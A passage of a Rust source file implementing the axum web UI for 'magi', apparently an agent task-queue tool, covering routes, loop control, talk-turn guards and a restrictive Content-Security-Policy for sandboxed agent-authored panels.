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magi/
web.rs

1//! The web UI: magi's queue and run history, readable from a phone.
2//!
3//! The terminal is the wrong surface for the two things an operator actually
4//! does between runs — file a task and check whether the last competition
5//! landed. Both happen away from the desk, so they get an HTTP surface: a
6//! handful of JSON routes and three embedded files.
7//!
8//! # One binary
9//!
10//! `index.html`, `app.css` and `app.js` are compiled in with [`include_str!`].
11//! There is no `--assets-dir` and no filesystem fallback, because a UI that
12//! reads its own front end from disk breaks the moment the binary is copied
13//! somewhere else — which is exactly what `cargo install magi-cli` does. No
14//! JS toolchain, no CDN, no remote font: everything the phone needs arrives
15//! from this process.
16//!
17//! # No authentication
18//!
19//! There is none, deliberately, and the startup log says so. The tailnet is
20//! the security boundary: `--bind auto` resolves to this machine's Tailscale
21//! address, so the UI is reachable from the operator's own devices and from
22//! nothing else. Anyone who can open the URL can file and hold tasks, which is
23//! why binding to `0.0.0.0` is not offered and why the fallback when Tailscale
24//! is missing is loopback rather than every interface.
25//!
26//! # Change notification
27//!
28//! A phone must not poll a full run list on a mobile link. `GET /api/events`
29//! is a server-sent stream carrying nothing but two revision numbers — the
30//! newest modification time in the queue and under the runs directory — so the
31//! client refetches only what moved. The browser's own SSE reconnection covers
32//! a sleeping phone; there is no session to lose.
33//!
34//! # Reading state must never take the server down
35//!
36//! A corrupt `run.json` is skipped in the list and explained with a 500 on the
37//! detail route. No handler unwraps a filesystem or parse result: a single bad
38//! file left by a killed run would otherwise turn the whole history into a
39//! blank page.
40//!
41//! # Agent-authored HTML, rendered anyway
42//!
43//! Everything else here refuses to put API data into the document: `app.js`
44//! builds nodes and sets `textContent`, and even an href from a run record is
45//! laundered first. A confirmation panel breaks that rule on purpose - an
46//! agent asking the owner to approve a merge needs a diff and a table, not one
47//! line of prose - and the only reason it is acceptable is that the panel is
48//! never part of this document.
49//!
50//! It is served by [`question_panel`] and [`question_asset`] and rendered in an
51//! `<iframe sandbox>` carrying no tokens: no `allow-scripts`, no
52//! `allow-same-origin`. So no script in a panel runs, and the frame cannot
53//! reach the parent document, the cookie jar or `localStorage`. On top of that
54//! both routes send [`PANEL_CSP`], which denies every network destination, so a
55//! panel cannot phone home through a remote image or a beacon either - the two
56//! things it may load, images and inline CSS, are the two things free
57//! formatting actually needs. Assets come from the question's own directory and
58//! never from the network, and their content types come from a closed
59//! whitelist, so an agent cannot get markup rendered outside the frame by
60//! naming a file `.html`.
61//!
62//! # A conversation turn is not a filesystem read
63//!
64//! Every other route here is disk work, which is why [`blocking`] exists.
65//! `POST /api/talks/{id}/say` is the exception: it spawns an agent CLI and
66//! waits tens of seconds for a sentence. It is a plain `await` holding no lock
67//! and no executor thread, and concurrent turns on one talk are refused rather
68//! than queued - see [`Ui::begin_talk_turn`].
69//!
70//! # The loop runs here
71//!
72//! `magi web` runs the queue loop in this process, started and stopped from
73//! `/api/loop`. That is the point of the whole surface: a task filed from a
74//! phone with nobody around to type `magi serve` is a task that sits in the
75//! queue until someone walks back to the machine.
76//!
77//! It is a tokio task holding a [`daemon::Stop`], not a child process. There
78//! is no pid file of this module's own and nothing to supervise - a child
79//! would need reaping, a second copy of the daemon's retry policy, and a
80//! story for what happens when `magi web` dies with the loop still running.
81//! `<home>/daemon.json`, which the loop itself writes, stays the only
82//! cross-process signal, and it is how this process notices that the
83//! operator's own `magi serve` already owns the loop and refuses to start a
84//! second one that would fight it for claims.
85//!
86//! Stopping is cooperative and therefore not instant. A run in flight is
87//! finished first, for the reason [`daemon::serve`] gives: killing the graph
88//! mid-node leaves worktrees, branches and agent sessions behind and throws
89//! away every agent call already paid for. `POST /api/loop` sets the flag and
90//! answers immediately rather than waiting, because the wait is measured in
91//! tens of minutes and the operator is holding a phone.
92
93use std::collections::{HashMap, HashSet};
94use std::convert::Infallible;
95use std::net::{IpAddr, Ipv4Addr, SocketAddr};
96use std::path::{Path as FsPath, PathBuf};
97use std::pin::Pin;
98use std::sync::{Arc, Mutex, MutexGuard, PoisonError};
99use std::time::Duration;
100use tokio::sync::Notify;
101
102use anyhow::{Context, Result};
103use axum::Json;
104use axum::Router;
105use axum::body::Bytes;
106use axum::extract::rejection::JsonRejection;
107use axum::extract::{DefaultBodyLimit, Path, Query, State};
108use axum::http::{HeaderMap, HeaderValue, StatusCode, header};
109use axum::response::sse::{Event, KeepAlive, Sse};
110use axum::response::{IntoResponse, Response};
111use axum::routing::{delete, get, post};
112use jiff::Timestamp;
113use serde::{Deserialize, Serialize};
114use tokio_stream::StreamExt as _;
115use tokio_stream::wrappers::ReceiverStream;
116
117use crate::ask::{Answer, Question, Questions};
118use crate::config::{Config, Update, UpdateMode};
119use crate::md;
120use crate::notices::{Notice, Notices};
121use crate::proc::Quiet as _;
122use crate::queue::{Queue, Task, title_from};
123use crate::run::{RunState, RunStatus};
124use crate::talk::{Talk, Talks};
125use crate::{daemon, git, report, repos, run, stats, talk, updater};
126
127/// Default port. Chosen high and memorable; nothing else in the fleet uses it.
128pub const DEFAULT_PORT: u16 = 7878;
129
130/// How often the change stream restats the queue and the runs directory.
131const POLL: Duration = Duration::from_secs(1);
132
133/// Keep-alive interval for the change stream. Phones and intermediaries drop
134/// an idle connection within a minute; a comment every fifteen seconds keeps
135/// the stream alive without waking the radio often enough to matter.
136const KEEPALIVE: Duration = Duration::from_secs(15);
137
138/// Ceiling on how long [`run_update_recheck`] ever sleeps between wake-ups.
139///
140/// A fixed period this long would not track a `[update] interval` shorter
141/// than itself: an operator who set `interval = "1m"` to make the deck
142/// notice a release within a minute would still wait up to fifteen of them
143/// for the next wake-up to even ask [`updater::Checker::should_check`].
144/// [`recheck_poll_period`] scales the sleep with the configured interval
145/// instead, and this is only its ceiling - reached at the default interval
146/// of a day, where waking any more often would just spend cycles asking a
147/// question that stays "no" for hours.
148const UPDATE_RECHECK_POLL_MAX: Duration = Duration::from_secs(15 * 60);
149
150/// Floor on the same, so a very short `[update] interval` cannot spin
151/// [`run_update_recheck`] in a near-busy loop.
152const UPDATE_RECHECK_POLL_MIN: Duration = Duration::from_secs(30);
153
154/// Runs returned when the client does not ask, and the ceiling if it asks for
155/// more. The cap exists because the list handler parses every `run.json` it
156/// returns, and a phone cannot render two thousand rows anyway.
157const LIST_DEFAULT: usize = 50;
158/// Upper bound for `?limit=`.
159const LIST_MAX: usize = 500;
160
161/// Width of a generated task title, matching what the CLI uses.
162const TITLE_MAX: usize = 72;
163
164/// Per-file cap for an attachment upload.
165///
166/// Enforced twice: axum's own body limit is raised one byte above this, only
167/// on the two attachment `POST` routes (see the router - every other route
168/// keeps the crate-wide default), so an oversize body is still read far
169/// enough to answer with our own message below rather than axum's generic
170/// one; this constant is what that message and the boundary check actually
171/// compare against.
172const ATTACHMENT_MAX_BYTES: usize = 10 * 1024 * 1024;
173
174/// The image types an attachment upload accepts - a closed whitelist, the
175/// same posture [`asset_content_type`] takes for panel assets and for the
176/// same reason: SVG is excluded on purpose because it is active content
177/// (it may carry `<script>`) and not merely a picture, so it never appears
178/// here even though `image/svg+xml` is a real IANA type.
179const ATTACHMENT_MIME_WHITELIST: [&str; 4] = ["image/png", "image/jpeg", "image/gif", "image/webp"];
180
181/// Header carrying the operator's own filename. Free text, stored only for
182/// display - see [`talk::Attachment::name`]'s doc on why it never
183/// contributes to a path.
184const FILENAME_HEADER: &str = "x-filename";
185
186/// The header that makes serving agent-authored HTML defensible, sent by both
187/// panel routes and asserted verbatim by a test.
188///
189/// Read it as a list of things a hostile panel cannot do. `default-src 'none'`
190/// denies every fetch destination that is not re-allowed below, which is all of
191/// them except images and fonts; `img-src 'self' data:` means an image comes
192/// from magi's own asset route or from the document itself, so a panel cannot
193/// signal an outside server by pointing an `<img>` at it - the classic
194/// exfiltration channel for markup that cannot run script. `style-src
195/// 'unsafe-inline'` is the one permission granted, because inline CSS is what
196/// free formatting means here and a style sheet cannot make a request that
197/// `default-src` has not already allowed. `base-uri 'none'` stops a `<base>`
198/// tag re-pointing the relative asset URLs somewhere else, `form-action 'none'`
199/// stops a form posting the owner's decision to a third party, and
200/// `frame-ancestors 'self'` stops another site framing the panel to phish with
201/// it.
202///
203/// There is deliberately no `script-src`: `default-src 'none'` already covers
204/// it, and the sandboxed frame carries no `allow-scripts` either, so script is
205/// denied twice over. Weakening any directive here is the difference between a
206/// panel the owner reads and a page that can talk to the tailnet, which is why
207/// the test compares the whole string rather than looking for a substring.
208const PANEL_CSP: &str = "default-src 'none'; img-src 'self' data:; style-src 'unsafe-inline'; \
209                         font-src data:; base-uri 'none'; form-action 'none'; \
210                         frame-ancestors 'self'";
211
212const INDEX_HTML: &str = include_str!("../assets/ui/index.html");
213const APP_CSS: &str = include_str!("../assets/ui/app.css");
214const APP_JS: &str = include_str!("../assets/ui/app.js");
215
216/// Which address to listen on.
217#[derive(Debug, Clone, Copy, PartialEq, Eq)]
218pub enum Bind {
219    /// Ask Tailscale, and fall back to loopback with a warning.
220    Auto,
221    /// An address the operator named.
222    Addr(IpAddr),
223}
224
225impl std::str::FromStr for Bind {
226    type Err = String;
227
228    /// `auto`, or anything [`IpAddr`] accepts. Parsing lives with the type so
229    /// the CLI can take `--bind` straight into it: the one spelling of
230    /// `auto` that matters is the one this function knows.
231    fn from_str(s: &str) -> std::result::Result<Self, Self::Err> {
232        if s.eq_ignore_ascii_case("auto") {
233            return Ok(Self::Auto);
234        }
235        s.parse()
236            .map(Self::Addr)
237            .map_err(|_| format!("expected `auto` or an IP address, got `{s}`"))
238    }
239}
240
241impl std::fmt::Display for Bind {
242    fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
243        match self {
244            Self::Auto => f.write_str("auto"),
245            Self::Addr(addr) => write!(f, "{addr}"),
246        }
247    }
248}
249
250/// How to serve.
251#[derive(Debug, Clone)]
252pub struct Opts {
253    /// Address to listen on.
254    pub bind: Bind,
255    /// Port to listen on.
256    pub port: u16,
257    /// Repository used for tasks posted without one.
258    pub repo: PathBuf,
259    /// Print the URL on its own line for a caller that wants to hand it to a
260    /// browser. magi never launches one itself.
261    pub open: bool,
262    /// Merge mode override for the loop this process runs (`none`, `local`,
263    /// `pr`); `None` leaves it to each repository's own config.
264    ///
265    /// The same override `magi serve --merge` takes, and here for the same
266    /// reason: `magi web` is now the thing that runs the loop, so an operator
267    /// who wants this session's runs to open pull requests has to be able to
268    /// say so without going back to the command they no longer type.
269    pub merge: Option<String>,
270}
271
272impl Default for Opts {
273    fn default() -> Self {
274        Self {
275            bind: Bind::Auto,
276            port: DEFAULT_PORT,
277            repo: PathBuf::from("."),
278            open: false,
279            merge: None,
280        }
281    }
282}
283
284/// Everything the handlers touch.
285///
286/// The queue, the runs directory and the magi home are fields rather than
287/// process-global lookups so a test drives the real router against a temp
288/// directory instead of the operator's own history.
289#[derive(Debug, Clone)]
290pub struct Ui {
291    queue: Queue,
292    questions: Questions,
293    /// `<home>/notifications`, the bell's own store. Derived from `home` in
294    /// [`Ui::new`] so no constructor signature had to grow.
295    notices: Notices,
296    talks: Talks,
297    runs: PathBuf,
298    home: PathBuf,
299    repo: PathBuf,
300    /// Where the runs' worktrees live, for the health disk figures.
301    ///
302    /// Spelled independently of [`crate::run::default_worktree_root`] so the
303    /// test servers can point it at their own temp directory: the health route
304    /// sizes it, and sizing the operator's real `~/wt/magi` from a test would
305    /// be measuring the machine instead of the server.
306    worktrees_root: PathBuf,
307    /// Talks with an agent turn in flight right now.
308    ///
309    /// In-process and therefore not durable, which is correct: it guards
310    /// against two taps on one phone and two phones on one tailnet, both of
311    /// which are this process's own concurrency. A second `magi web` would not
312    /// see it, and a second `magi web` on the same home is already a
313    /// misconfiguration the queue's claims would catch first.
314    talk_turns: Arc<Mutex<TalkTurns>>,
315    /// Runs this process is resuming right now.
316    ///
317    /// Separate from `talk_turns` because a run and a talk are different
318    /// things to hold, and a resume is far more expensive to start twice: it
319    /// re-asks agent seats. Same reasoning about scope as `talk_turns` — this
320    /// guards two taps and two phones, which is this process's own
321    /// concurrency.
322    resuming: Arc<Mutex<HashSet<String>>>,
323    /// The last scan of `[repos] roots`, and when it happened. Shared across
324    /// requests so polling `GET /api/repos` repeatedly does not repeat the
325    /// filesystem walk every time - see [`repos::Cache`].
326    repos_cache: repos::Cache,
327    /// Merge mode override handed to the loop this process starts.
328    merge: Option<String>,
329    /// The loop this process is running, if it is running one.
330    looping: Arc<Mutex<LoopState>>,
331    /// How a loop is actually started.
332    ///
333    /// A field rather than a direct call to [`daemon::serve_until`], because
334    /// the real loop resolves its queue and its status file through the
335    /// process-global magi home and claims whatever it finds there. A test
336    /// that started it would reach straight past its own temp directory into
337    /// the operator's live queue, overwrite the status file of the `magi
338    /// serve` that owns it, and spend real agent quota on a real competition.
339    /// What the routes have to get right is the bookkeeping, so the tests
340    /// drive the routes against a loop that only starts and stops; production
341    /// is [`launch_daemon`] and nothing reassigns it.
342    launch: Launch,
343    /// A test-only stop point inside `talk_say`'s busy branch. See
344    /// [`BusyQueueGate`].
345    #[cfg(test)]
346    busy_queue_gate: Arc<Mutex<Option<BusyQueueGate>>>,
347}
348
349/// A one-shot stop point the busy branch's queued-draft write can be made to
350/// pause at, right before [`talk::queue`] runs.
351///
352/// Exists because a test cannot otherwise pin *when*, relative to the turn
353/// slot being freed, that write happens: `blocking` runs it on
354/// `spawn_blocking`, whose `JoinHandle` resolves in a single poll if the job
355/// already finished, so counting polls on the handler future to park it at a
356/// particular `.await` is a guess about scheduling, not a fact about it - see
357/// `a_dropped_handler_future_after_queueing_still_drains_the_draft`, which
358/// used to do exactly that and paid for it with an occasional "async fn
359/// resumed after completion" panic under load.
360///
361/// `reached` fires the instant the write is about to run, so a test waits for
362/// a real event instead of a poll count. `release` then blocks the write
363/// until the test says to continue; it is a `std::sync::mpsc::Receiver`
364/// rather than an async channel because this all happens inside the
365/// `spawn_blocking` closure the write already runs on, off any runtime
366/// worker, so blocking here costs nothing the write was not already going to
367/// cost.
368#[cfg(test)]
369struct BusyQueueGate {
370    reached: tokio::sync::oneshot::Sender<()>,
371    release: std::sync::mpsc::Receiver<()>,
372}
373
374#[cfg(test)]
375impl std::fmt::Debug for BusyQueueGate {
376    fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
377        f.debug_struct("BusyQueueGate").finish_non_exhaustive()
378    }
379}
380
381impl Ui {
382    /// A server over explicit paths.
383    pub fn new(
384        queue: Queue,
385        questions: Questions,
386        talks: Talks,
387        runs: PathBuf,
388        home: PathBuf,
389        repo: PathBuf,
390    ) -> Self {
391        Self {
392            queue,
393            questions,
394            notices: Notices::at(home.join("notifications")),
395            talks,
396            runs,
397            home,
398            repo,
399            // The default location, overridden by `with_worktrees_root` - a
400            // builder step rather than a ninth parameter, for the reason
401            // `with_merge` gives.
402            worktrees_root: run::default_worktree_root(),
403            talk_turns: Arc::default(),
404            resuming: Arc::default(),
405            repos_cache: repos::Cache::new(),
406            merge: None,
407            looping: Arc::default(),
408            launch: launch_daemon,
409            #[cfg(test)]
410            busy_queue_gate: Arc::default(),
411        }
412    }
413
414    /// The operator's own state: `<home>/queue`, `<home>/questions`,
415    /// `<home>/talks`, `<home>/runs`.
416    pub fn open(repo: PathBuf) -> Self {
417        Self::new(
418            Queue::open(),
419            Questions::open(),
420            Talks::open(),
421            run::runs_root(),
422            run::home(),
423            repo,
424        )
425    }
426
427    /// The merge mode the loop should use, as the command line gave it.
428    ///
429    /// A builder step rather than a seventh parameter on [`Ui::new`], because
430    /// the override is a property of how this process was invoked and not of
431    /// where its state lives - which is all the tests that build a `Ui` by
432    /// hand are saying.
433    #[must_use]
434    pub fn with_merge(mut self, merge: Option<String>) -> Self {
435        self.merge = merge;
436        self
437    }
438
439    /// Where the runs' worktrees live, when it is not the default.
440    ///
441    /// The health view sizes this directory, so a test that leaves it at the
442    /// default would be measuring the operator's own machine.
443    #[must_use]
444    pub fn with_worktrees_root(mut self, root: PathBuf) -> Self {
445        self.worktrees_root = root;
446        self
447    }
448
449    /// Point the loop at something other than [`launch_daemon`].
450    ///
451    /// Test-only, and deliberately: see [`Ui::launch`] for why no test in
452    /// this crate may start the real loop.
453    #[cfg(test)]
454    #[must_use]
455    fn with_launch(mut self, launch: Launch) -> Self {
456        self.launch = launch;
457        self
458    }
459
460    /// Install a [`BusyQueueGate`] for the next pass through the busy
461    /// branch's queued-draft write, replacing any earlier one.
462    ///
463    /// A setter on `&self` rather than a `with_*` builder consumed once,
464    /// because a test that drives the busy branch more than once (as
465    /// `a_dropped_handler_future_after_queueing_still_drains_the_draft` does,
466    /// to build confidence the interleaving is handled deterministically and
467    /// not just on a lucky run) needs a fresh channel pair each time, on the
468    /// one `Ui` it already built its temp directories around.
469    #[cfg(test)]
470    fn set_busy_queue_gate(&self, gate: BusyQueueGate) {
471        *self
472            .busy_queue_gate
473            .lock()
474            .unwrap_or_else(PoisonError::into_inner) = Some(gate);
475    }
476
477    /// The loop's state, for [`serve`]'s own way out.
478    fn looping(&self) -> Arc<Mutex<LoopState>> {
479        Arc::clone(&self.looping)
480    }
481
482    /// Start the loop in this process, or say who already has one.
483    ///
484    /// `foreign` is passed in rather than read here so that one request makes
485    /// one judgement about who owns the loop: reading the status file again
486    /// inside this function could refuse a start for a daemon the same
487    /// response then reports as gone.
488    fn start_loop(&self, foreign: Option<Foreign>) -> ApiResult<()> {
489        if let Some(other) = foreign {
490            return Err(ApiError::conflict(format!(
491                "{} is already running the loop, so this one will not start a \
492                 second: two loops on one queue race for the same claims and \
493                 burn the agent quota twice over. Stop it where it was \
494                 started.",
495                other.who()
496            )));
497        }
498        let mut state = self.lock_loop();
499        if state.live.as_ref().is_some_and(Live::alive) {
500            return Err(ApiError::conflict(format!(
501                "this magi web process (pid {}) is already running the loop",
502                std::process::id()
503            )));
504        }
505
506        let stop = daemon::Stop::new();
507        // The CLI's own defaults for everything the UI has no opinion about:
508        // one poll interval and one retry budget, so a loop started from a
509        // phone behaves exactly like the `magi serve` it replaces.
510        let opts = daemon::Opts {
511            repo: self.repo.clone(),
512            merge: self.merge.clone(),
513            // Whatever this `Ui` already reports worktree sizes and folds
514            // against (see `with_worktrees_root`) is what the loop it starts
515            // must reclaim orphaned worktrees under too - two different
516            // opinions about where the worktree bay is would leave the
517            // janitor pass reclaiming a directory nothing else on this
518            // process is even looking at.
519            worktrees_root: Some(self.worktrees_root.clone()),
520            ..daemon::Opts::default()
521        };
522        let launch = self.launch;
523        let looping = Arc::clone(&self.looping);
524        let handle = tokio::spawn({
525            let opts = opts.clone();
526            let stop = stop.clone();
527            async move {
528                let failure = match launch(opts, stop).await {
529                    Ok(()) => None,
530                    Err(e) => Some(format!("{e:#}")),
531                };
532                match &failure {
533                    Some(why) => tracing::error!("the loop stopped: {why}"),
534                    None => tracing::info!("the loop stopped"),
535                }
536                // Recorded by the task itself rather than reaped by whichever
537                // request happens next, so `loop_rev` moves the moment the
538                // loop ends and a phone with the change stream open learns
539                // that it did. Clearing `live` drops this task's own handle,
540                // which only detaches it, and is the last thing it does.
541                let mut state = lock_or_recover(&looping);
542                state.live = None;
543                state.last_error = failure;
544                state.rev += 1;
545            }
546        });
547        tracing::info!(
548            "the loop is now running in this process: repo {}, merge {}",
549            opts.repo.display(),
550            opts.merge.as_deref().unwrap_or("as the config says")
551        );
552        state.live = Some(Live { stop, handle, opts });
553        // A fresh start is not the place to keep showing why the last one
554        // died; the operator has read it and pressed the button anyway.
555        state.last_error = None;
556        state.rev += 1;
557        Ok(())
558    }
559
560    /// Ask the loop to stop, without waiting for it to get there.
561    ///
562    /// Idempotent: a second tap on stop is not an error, because the first one
563    /// leaves the loop running for as long as the run in flight takes and the
564    /// operator has no way to tell a slow stop from a lost one.
565    fn stop_loop(&self, foreign: Option<Foreign>, park: bool) -> ApiResult<()> {
566        if let Some(other) = foreign {
567            return Err(ApiError::conflict(format!(
568                "the loop belongs to {}, and this process cannot stop it - \
569                 stop it where it was started. A button that silently did \
570                 nothing would be worse than this refusal.",
571                other.who()
572            )));
573        }
574        let mut state = self.lock_loop();
575        let Some(live) = state.live.as_ref() else {
576            return Ok(());
577        };
578        // A park upgrades a stop that has already been asked for: the
579        // operator who tapped "stop" and then realised the run has an hour
580        // left must not have to restart the loop to change their mind.
581        if live.stop.stopped() && (!park || live.stop.parking()) {
582            return Ok(());
583        }
584        if park {
585            live.stop.park();
586            tracing::info!("the loop was asked to park; the run stops at its next node boundary");
587        } else {
588            live.stop.stop();
589            tracing::info!("the loop was asked to stop; a run in flight is finished first");
590        }
591        state.rev += 1;
592        Ok(())
593    }
594
595    /// The loop as both `/api/loop` and `/api/health` report it.
596    ///
597    /// `reading` is the caller's single read of `<home>/daemon.json`, because
598    /// health answers with this view *and* the daemon object beside it: one
599    /// read per response is what stops a single answer naming a foreign owner
600    /// in one field and calling the loop free in the other.
601    fn loop_view(&self, reading: Option<daemon::Reading>) -> LoopView {
602        let state = self.lock_loop();
603        // A loop that panicked never recorded its own end, so the handle -
604        // not the presence of the record - is what "running" means.
605        let live = state.live.as_ref().filter(|live| live.alive());
606        LoopView {
607            running: live.is_some(),
608            stopping: live.is_some_and(|live| live.stop.finishing()),
609            parking: live.is_some_and(|live| live.stop.parking()),
610            owned: live.is_some(),
611            repo: live
612                .map_or(&self.repo, |live| &live.opts.repo)
613                .display()
614                .to_string(),
615            merge: live.map_or_else(|| self.merge.clone(), |live| live.opts.merge.clone()),
616            last_error: state.last_error.clone(),
617            daemon: DaemonView::of(reading),
618        }
619    }
620
621    /// Take the loop lock. See [`lock_or_recover`] for why it cannot fail.
622    fn lock_loop(&self) -> MutexGuard<'_, LoopState> {
623        lock_or_recover(&self.looping)
624    }
625
626    /// Whether this process currently owns the agent turn for `id`.
627    ///
628    /// This deliberately describes only the in-memory claim made by
629    /// [`Ui::begin_talk_turn`]. It is not conversation data and therefore is
630    /// never persisted with a [`Talk`].
631    fn is_thinking(&self, id: &str) -> bool {
632        self.talk_turns
633            .lock()
634            .is_ok_and(|turns| turns.live.contains(id))
635    }
636
637    /// Claim the right to run one turn in a talk, or report that it is busy.
638    ///
639    /// A talk is strictly turn-based: the agent is resumed with the
640    /// conversation it already has, so two turns running at once would resume
641    /// the same session twice and append their answers in whatever order the
642    /// two CLIs finished in. The operator would come back to a transcript
643    /// with two half-turns interleaved, which is unreadable and, worse,
644    /// unfixable - there is no undo for a persisted turn.
645    ///
646    /// A busy result is queued as a durable draft by [`talk_say`], rather than
647    /// starting a second CLI invocation for the same session.
648    ///
649    /// The lock is a `std::sync::Mutex` and never crosses an `await`: it is
650    /// taken to test-and-insert and released before the agent is spawned. The
651    /// returned guard removes the id on drop, which is what makes a panicking
652    /// handler or a phone that walks out of range leave the talk usable - axum
653    /// drops the handler future when the client disconnects, and without the
654    /// guard that talk would be wedged until the server restarted.
655    fn begin_talk_turn(&self, id: &str) -> ApiResult<Option<TalkTurnGuard>> {
656        self.claim_talk_turn(id, false)
657    }
658
659    /// Claim a turn after durably queueing a draft, or notify its current
660    /// owner that a drainer must recheck before it releases the slot.
661    fn begin_queued_talk_turn(&self, id: &str) -> ApiResult<Option<TalkTurnGuard>> {
662        self.claim_talk_turn(id, true)
663    }
664
665    fn claim_talk_turn(&self, id: &str, queued: bool) -> ApiResult<Option<TalkTurnGuard>> {
666        let mut live = self
667            .talk_turns
668            .lock()
669            .map_err(|_| ApiError::internal("the talk turn lock was poisoned"))?;
670        if !live.live.insert(id.to_owned()) {
671            if queued {
672                // A queued write has landed before this busy check.
673                // `drain_loop` uses this generation to recheck after its
674                // off-thread disk read, so it cannot release a turn between
675                // this check and the write.
676                *live.queued.entry(id.to_owned()).or_default() += 1;
677            }
678            return Ok(None);
679        }
680        Ok(Some(TalkTurnGuard {
681            talk: id.to_owned(),
682            turns: Arc::clone(&self.talk_turns),
683            released: false,
684        }))
685    }
686
687    /// Decide whether a free talk may start a new immediate turn while its
688    /// claim lock is held. A persisted draft without an owner is recovery
689    /// state, not a busy turn: two simultaneous `/say` requests must both
690    /// leave it untouched rather than one of them appending to it.
691    fn begin_talk_turn_unless_pending(&self, id: &str) -> ApiResult<TalkTurnStart> {
692        let mut live = self
693            .talk_turns
694            .lock()
695            .map_err(|_| ApiError::internal("the talk turn lock was poisoned"))?;
696        if live.live.contains(id) {
697            return Ok(TalkTurnStart::Busy);
698        }
699        let talk = self.talks.get(id).map_err(ApiError::from)?;
700        if !talk.pending.is_empty() || !talk.pending_attachments.is_empty() {
701            return Ok(TalkTurnStart::Pending);
702        }
703        live.live.insert(id.to_owned());
704        Ok(TalkTurnStart::Claimed(TalkTurnGuard {
705            talk: id.to_owned(),
706            turns: Arc::clone(&self.talk_turns),
707            released: false,
708        }))
709    }
710
711    /// Park the loop for an upgrade, and report the run that is parking.
712    ///
713    /// A park rather than a stop: a stop waits out the whole competition, and
714    /// not waiting is the point of upgrading from a phone. `None` means
715    /// nothing was in flight, which is worth saying so the operator is not
716    /// told a run is parking when none is.
717    fn park_for_upgrade(&self) -> ApiResult<Option<String>> {
718        let parking = {
719            let mut state = self.lock_loop();
720            let Some(live) = state.live.as_ref() else {
721                return Ok(None);
722            };
723            let busy = live.stop.busy_now();
724            live.stop.park();
725            state.rev += 1;
726            busy
727        };
728        Ok(if parking {
729            // More than one run can be in flight now (see
730            // `Config::daemon.max_concurrent_runs`); this answer names one of
731            // them so the operator sees a park actually happened, not every
732            // run a park now asks to stop at its next boundary.
733            daemon::current_work(&self.home, jiff::Timestamp::now())
734                .into_iter()
735                .next()
736                .map(|c| c.run)
737        } else {
738            None
739        })
740    }
741
742    /// Claim a run for a resume, on the same reasoning as
743    /// [`Ui::begin_talk_turn`]: a guard that releases on drop, so a
744    /// disconnected phone does not wedge the run until the server restarts.
745    fn begin_resume(&self, id: &str) -> ApiResult<ResumeGuard> {
746        let mut live = self
747            .resuming
748            .lock()
749            .map_err(|_| ApiError::internal("the resume lock was poisoned"))?;
750        if !live.insert(id.to_owned()) {
751            return Err(ApiError::conflict(format!(
752                "run {id} is already being resumed"
753            )));
754        }
755        Ok(ResumeGuard {
756            run: id.to_owned(),
757            resuming: Arc::clone(&self.resuming),
758        })
759    }
760
761    /// The router, with this state baked in.
762    ///
763    /// The three front-end files get one explicit route each rather than a
764    /// path parameter, so there is no traversal surface to get wrong: the set
765    /// of servable paths is the set written here. The asset route below is the
766    /// one exception and the only place in this server where a client names a
767    /// file; it is why [`valid_asset_name`] is checked before a path is built.
768    pub fn router(self) -> Router {
769        Router::new()
770            .route("/", get(index))
771            .route("/app.css", get(app_css))
772            .route("/app.js", get(app_js))
773            .route("/api/health", get(health))
774            .route("/api/loop", get(loop_get).post(loop_post))
775            .route("/api/upgrade", post(upgrade_post))
776            .route("/api/runs", get(runs_list))
777            .route("/api/runs/{id}", get(run_detail).delete(run_delete))
778            .route("/api/runs/{id}/report", get(run_report))
779            .route("/api/runs/{id}/fold", post(run_fold))
780            .route("/api/runs/{id}/fold-merged", post(run_fold_merged))
781            .route("/api/runs/{id}/resume", post(run_resume))
782            .route("/api/queue", get(queue_list))
783            .route("/api/stats", get(stats_get))
784            .route("/api/queue/{id}", delete(queue_delete))
785            .route("/api/repos", get(repos_list))
786            .route("/api/queue/{id}/hold", post(queue_hold))
787            .route("/api/queue/{id}/release", post(queue_release))
788            .route("/api/queue/{id}/priority", post(queue_priority))
789            .route("/api/queue/{id}/edit", post(queue_edit))
790            .route("/api/queue/{id}/done", post(queue_done))
791            .route("/api/questions", get(questions_list))
792            .route("/api/questions/{id}/answer", post(question_answer))
793            .route("/api/questions/{id}/say", post(question_say))
794            .route("/api/questions/{id}/panel", get(question_panel))
795            // The same asset, reachable from inside the panel by its bare
796            // filename. A document served at `.../panel` resolves `shot.png`
797            // to `.../shot.png`, which is not the asset route, so a panel
798            // written the way its author was told to write it showed broken
799            // images. `base-uri 'none'` means a `<base>` tag cannot paper over
800            // it - deliberately - so the fix is that the panel's own URL ends
801            // in a filename and its siblings are the assets.
802            .route("/api/questions/{id}/panel/index.html", get(question_panel))
803            .route("/api/questions/{id}/panel/{name}", get(question_asset))
804            .route("/api/questions/{id}/asset/{name}", get(question_asset))
805            .route("/api/notifications", get(notifications_list))
806            .route("/api/notifications/read-all", post(notifications_read_all))
807            .route("/api/notifications/{id}/read", post(notification_read))
808            .route(
809                "/api/notifications/{id}/dismiss",
810                post(notification_dismiss),
811            )
812            .route("/api/talks", get(talks_list).post(talk_post))
813            .route("/api/talks/{id}", get(talk_detail).delete(talk_delete))
814            .route("/api/talks/{id}/say", post(talk_say))
815            .route("/api/talks/{id}/pending/resume", post(talk_pending_resume))
816            .route("/api/talks/{id}/pending/clear", post(talk_pending_clear))
817            .route("/api/talks/{id}/pending/edit", post(talk_pending_edit))
818            .route("/api/talks/{id}/close", post(talk_close))
819            .route("/api/talks/{id}/reopen", post(talk_reopen))
820            // `DefaultBodyLimit` is raised only on this one route - every
821            // other route on this server answers in a few kilobytes, and
822            // widening the crate-wide default for all of them just because
823            // one accepts a picture would let any other handler be handed
824            // a multi-megabyte body it never expects.
825            .route(
826                "/api/talks/{id}/attachments",
827                post(talk_attachment_post).layer(DefaultBodyLimit::max(ATTACHMENT_MAX_BYTES + 1)),
828            )
829            .route(
830                "/api/talks/{id}/attachments/{att}",
831                get(talk_attachment_get),
832            )
833            .route("/api/events", get(events))
834            .with_state(Arc::new(self))
835    }
836}
837
838/// One talk's turn slot, released on drop.
839///
840/// A guard rather than a matching `remove` at the end of the handler, because
841/// the handler has several early returns and one `await` that can be cancelled
842/// out from under it. A leaked id is a talk nobody can talk to again.
843#[derive(Debug)]
844struct TalkTurnGuard {
845    talk: String,
846    turns: Arc<Mutex<TalkTurns>>,
847    released: bool,
848}
849
850/// In-memory turn ownership plus the queue generation observed by a drainer.
851///
852/// The generation changes only after a durable queued draft is written and its
